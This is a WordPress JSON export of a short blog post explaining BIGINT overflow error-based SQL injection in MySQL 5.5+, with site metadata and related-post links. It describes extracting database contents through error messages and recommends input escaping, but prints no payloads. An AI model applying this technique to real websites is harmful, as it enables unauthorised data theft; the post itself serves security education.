{"id":199,"date":"2016-02-14T00:54:08","date_gmt":"2016-02-14T00:54:08","guid":{"rendered":"http:\/\/chewett.co.uk\/?p=199"},"modified":"2019-01-20T23:42:05","modified_gmt":"2019-01-20T23:42:05","slug":"bigint-overflow-error-based-sql-injection","status":"publish","type":"post","link":"https:\/\/chewett.co.uk\/blog\/199\/bigint-overflow-error-based-sql-injection\/","title":{"rendered":"BIGINT Overflow Error Based SQL Injection"},"content":{"rendered":"

In MySQL 5.5+ you can abuse a new feature with BIGINT values. This involves a problem called integer rollover and your ability to run arbitrary SQL.<\/p>\n

The problem of integer rollover<\/h2>\n

Integer rollover happens when a number is too big or small and is made bigger\/smaller.<\/p>\n

In the case where the number is the highest possible stored value adding to it makes it larger and it becomes as small as it can. Similarly when the number is too small and it has something subtracted from it it becomes very large.<\/p>\n

This is down to how the number is represented in binary where it tries to make the value bigger\/smaller and it “rolls over”. This is typically undesired behavior but in many languages this happens silently. Previously this was something you checked for manually however newer languages are starting to check and raise errors for this.<\/p>\n

How MySQL is affected by this<\/h2>\n

Now in MySQL versions 5.5 or later instead of silently wrapping around it will raise an error and fail. This is considered better than silently making your number radically different.<\/p>\n

 <\/p>\n

If the website displays the mysql error directly, it will report back the result of the query that caused the rollaround. If a site incorrectly does this and allows unsanitized input to be sent to the database this allows you to craft a query and view the results.<\/p>\n

By creating a subquery for the request and guessing table names you can pull out any data in the database. Worse is that this works for the information schema so you are able to get the data you need by querying this. Having full access to the database can mean that you can then download sensitive information.<\/p>\n

Fixing this exploit<\/h2>\n

Here the exploit is stopped by properly escaping user input which is something that many websites still forget to do. In addition since this requires viewing the data in the returned error turning off error reporting would stop this bug, but not stop the ability to insert data via a subquery. Even in the case that the error is not shown back, being able to insert data may allow privilege escalation.<\/p>\n

The full exploit including example code is available online<\/a> and includes example code and the full explanation. This is another example of why is it critically important to sanitize input from users.<\/p>\n","protected":false},"excerpt":{"rendered":"

In MySQL 5.5+ you can abuse a new feature with BIGINT values. This involves a problem called integer rollover and your ability to run arbitrary SQL. The problem of integer rollover Integer rollover happens when a number is too big or small and is made bigger\/smaller. In the case where the number is the highest […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[5],"tags":[95,60,96],"class_list":["post-199","post","type-post","status-publish","format-standard","hentry","category-informational","tag-exploit","tag-mysql","tag-sql"],"wppr_data":{"cwp_meta_box_check":"No"},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p2toWX-3d","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":2786,"url":"https:\/\/chewett.co.uk\/blog\/2786\/fixing-raspberry-pi-mysql-access-denied-for-user-root-with-non-root-user\/","url_meta":{"origin":199,"position":0},"title":"Fixing Raspberry Pi MySQL Access Denied for user root with non root user","author":"Chewett","date":"February 6, 2021","format":false,"excerpt":"This blog post talks about how you can log in as root to your MySQL database with a non-root user on your Raspberry Pi. The \"Access denied for user 'root'@'localhost'\" error After setting up your database you might have changed the root password using mysql_secure_installation however it will still give\u2026","rel":"","context":"In "Informational"","block_context":{"text":"Informational","link":"https:\/\/chewett.co.uk\/blog\/category\/informational\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/fixing_raspi_mysql_root_login_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/fixing_raspi_mysql_root_login_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/fixing_raspi_mysql_root_login_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/fixing_raspi_mysql_root_login_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/fixing_raspi_mysql_root_login_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":2207,"url":"https:\/\/chewett.co.uk\/blog\/2207\/distributed-automated-halite-3-bot-tester\/","url_meta":{"origin":199,"position":1},"title":"Distributed Automated Halite 3 Bot Tester","author":"Chewett","date":"June 1, 2019","format":false,"excerpt":"In this post I talk about the work I did to improve the Halite 3 Bot testing gym to speed up iterations and compare various versions of my bot. Why I spent time Improving the Halite Gym During the competition of Halite 3 one piece of provided code was a\u2026","rel":"","context":"In "Software"","block_context":{"text":"Software","link":"https:\/\/chewett.co.uk\/blog\/category\/software\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2019\/06\/halite_distributed_gym.jpg?fit=654%2C653&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2019\/06\/halite_distributed_gym.jpg?fit=654%2C653&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2019\/06\/halite_distributed_gym.jpg?fit=654%2C653&ssl=1&resize=525%2C300 1.5x"},"classes":[]},{"id":1001,"url":"https:\/\/chewett.co.uk\/blog\/1001\/raspberry-pi-cluster-node-04-configuration-files-configparser\/","url_meta":{"origin":199,"position":2},"title":"Raspberry Pi Cluster Node \u2013 04 Configuration Files with ConfigParser","author":"Chewett","date":"February 10, 2018","format":false,"excerpt":"This post builds on the\u00a0third step to create a Raspberry Pi Cluster Node\u00a0to store our configuration settings in a config file. Here we move all the configuration settings in our script into a useful .cfg file using the python ConfigParser. Why use Configuration Files? When developing a system there will\u2026","rel":"","context":"In "Raspberry Pi Cluster"","block_context":{"text":"Raspberry Pi Cluster","link":"https:\/\/chewett.co.uk\/blog\/category\/raspberry-pi-cluster\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/02\/rpi_cluster_04_config_parser.jpg?fit=800%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/02\/rpi_cluster_04_config_parser.jpg?fit=800%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/02\/rpi_cluster_04_config_parser.jpg?fit=800%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/02\/rpi_cluster_04_config_parser.jpg?fit=800%2C800&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":194,"url":"https:\/\/chewett.co.uk\/blog\/194\/mysql-workbench-working-with-key-based-exchange-mechanisms\/","url_meta":{"origin":199,"position":3},"title":"Mysql workbench working with key based exchange mechanisms","author":"Chewett","date":"June 3, 2015","format":false,"excerpt":"It appears newer linux sshd configs\u00a0(fedora 22) by default include a smaller set of key exchange based mechanisms that they have turned on. This means that it gives errors saying it is unable to connect to the server. To fix this you need to enable some of the older key\u2026","rel":"","context":"In "Fixes"","block_context":{"text":"Fixes","link":"https:\/\/chewett.co.uk\/blog\/category\/fixes\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1321,"url":"https:\/\/chewett.co.uk\/blog\/1321\/how-to-install-the-official-mysql-community-server-on-fedora-28\/","url_meta":{"origin":199,"position":4},"title":"How to Install the official MySQL community server on Fedora 28","author":"Chewett","date":"July 25, 2018","format":false,"excerpt":"Today I talk about how you can install the official\u00a0MySQL community server on Fedora 28. Why you cant just use DNF to install mysql-server In the last couple versions of Fedora the default MySQL\u00a0distribution was changed to mariadb. While this is, for the most part, a drop in replacement this\u2026","rel":"","context":"In "Informational"","block_context":{"text":"Informational","link":"https:\/\/chewett.co.uk\/blog\/category\/informational\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/07\/installing_offical_mysql.jpg?fit=800%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/07\/installing_offical_mysql.jpg?fit=800%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/07\/installing_offical_mysql.jpg?fit=800%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2018\/07\/installing_offical_mysql.jpg?fit=800%2C800&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":2783,"url":"https:\/\/chewett.co.uk\/blog\/2783\/how-to-install-a-mysql-server-on-a-raspberry-pi\/","url_meta":{"origin":199,"position":5},"title":"How to install a MySQL Server on a Raspberry Pi","author":"Chewett","date":"January 30, 2021","format":false,"excerpt":"This blog post explains the steps you need to perform to install a MySQL server on a Raspberry Pi. Ensuring the Raspberry Pi is up to date Before installing any programs it is recommended to make sure your Raspberry Pi is up to date. This reduces the change of a\u2026","rel":"","context":"In "Informational"","block_context":{"text":"Informational","link":"https:\/\/chewett.co.uk\/blog\/category\/informational\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/install_mysql_raspi_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/install_mysql_raspi_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/install_mysql_raspi_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/install_mysql_raspi_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/chewett.co.uk\/blog\/wp-content\/uploads\/2021\/01\/install_mysql_raspi_posticon_OUTPUT.png?fit=1200%2C628&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/posts\/199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=199"}],"version-history":[{"count":2,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/posts\/199\/revisions"}],"predecessor-version":[{"id":1961,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/posts\/199\/revisions\/1961"}],"wp:attachment":[{"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=199"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=199"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/chewett.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}